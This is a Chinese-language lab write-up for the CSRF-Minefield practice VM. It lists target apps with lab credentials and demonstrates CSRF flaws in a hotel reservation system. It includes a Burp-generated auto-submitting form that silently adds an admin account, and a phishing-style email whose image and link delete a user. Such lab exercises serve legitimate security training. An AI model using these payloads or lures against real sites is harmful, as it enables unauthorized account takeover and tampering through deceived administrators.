环境
Winodws10 x64
WMware 15
CSRF-Minefield-V1.0 靶机
靶机下载,利用WMware打开靶机,进行测试。
测试目录预览
1、Bolt CMS 3.6.6
http://192.168.126.162/bolt | Username:admin Password:admin123
2、PilusCart 1.4.1
http://192.168.126.162/pilus | Username:admin Password:admin123
3、zzzphp CMS 1.6.1
http://192.168.126.162/zzzphp | Admin link: http://192.168.126.162/zzzphp/admin537/login.php | Username:admin Password:admin123
4、CMSSite 1.0
http://192.168.126.162/cmssite/ | Username:victor Password:victor
5、OOP CMS Blog 1.0
http://192.168.126.162/oop/ | Admin link: http://192.168.126.162/oop/admin | Username:admin Password:123
6、Integria IMS 5.0.83
http://192.168.126.162/integriaims/ | Username:admin Password:integria
7、ZeusCart 4.0
http://192.168.126.162/zeuscart/ | Admin link: http://192.168.126.162/zeuscart/admin | Username:admin Password:admin123
8、WSTMart 2.0.8
http://192.168.126.162/wstmart/ | Admin link: http://192.168.126.162/wstmart/admin.php | Username:admin Password:admin123
9、Simple Online Hotel Reservation System
http://192.168.126.162/hotelcal | Admin link: http://192.168.126.162/hotelcal/admin | Username:admin Password:admin
10、OrientDB 3.0.17 GA Community Edition
Command to start web app:/opt/orient/bin/server.sh | http://192.168.126.162:2480/studio/index.html | Username:root Password:toor
11、Apache CouchDB 2.3.1
Command to start web app:/opt/couchdb/bin/couchdb | http://192.168.126.162:5984/_utils/index.html | Username:root Password:toor
下列测试步骤不分先后
9、Simple Online Hotel Reservation System
一、创建用户存在CSRF
1、打开192.168.3.45//hotelcal/admin,进行登录,如下:
Accounts
创建一个用户,如下:
创建一个用户
2、利用burpsuite抓取数据包如下:
burpsuite抓取数据包
发现没有使用Cookie token,将其数据包发送给burpsuite插件CSRF POC(burpsuite里可下载),如下:
image.png
生成POC,如下:
CSRF POC
将生产的POC保存为csrfpoc.htm。在本地利用phpstduy开一个服务器,将csrfpoc.html放www目录下,发送邮箱给admin用户,登录QQ邮箱,
image.png
编辑html源代码
保存好点击发送。登录163邮箱(这里假设admin使用163邮箱),收到邮箱进入:
image.png
点击clik here,出现如下
image.png
image.png
这里提供一个CSRF POC,点击链接直接添加用户成功。
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body onload=document.getElementById('ese-csrf').submit()>
<form id="ese-csrf" action="http://192.168.3.45/hotelcal/admin/add_account.php" method="POST">
<input type="hidden" name="name" value="ese" />
<input type="hidden" name="username" value="ese" />
<input type="hidden" name="password" value="ese123" />
<input type="hidden" name="add_account" value="" />
</form>
</body>
</html>
二、删除用户存在CSRF
1、删除用户
删除用户
抓取数据包
image.png
发现没有使用Cookie token,编辑CSRF POC,邮箱发送
<html>
<body>
<p>Hi Uday</p>
<p>Please Check the banner </p>
<p></p>
<p><a href="http://192.168.3.45/hotelcal/admin/delete_account.php?admin_id=8"><img alt="the banner" src="http://192.168.3.45/hotelcal/admin/delete_account.php?admin_id=8" style="width: 100px;height: 100px;"/></a></p>
<p>if the image does not load,please<a href="http://192.168.3.45/hotelcal/admin/delete_account.php?admin_id=8"> clik here </a>to download</p>
<p>Warm Regards</p>
</body>
</html>
邮箱接收后点击,点击clik here,跳到管理页面,发现用户已被删除,存在CSRF。
网友评论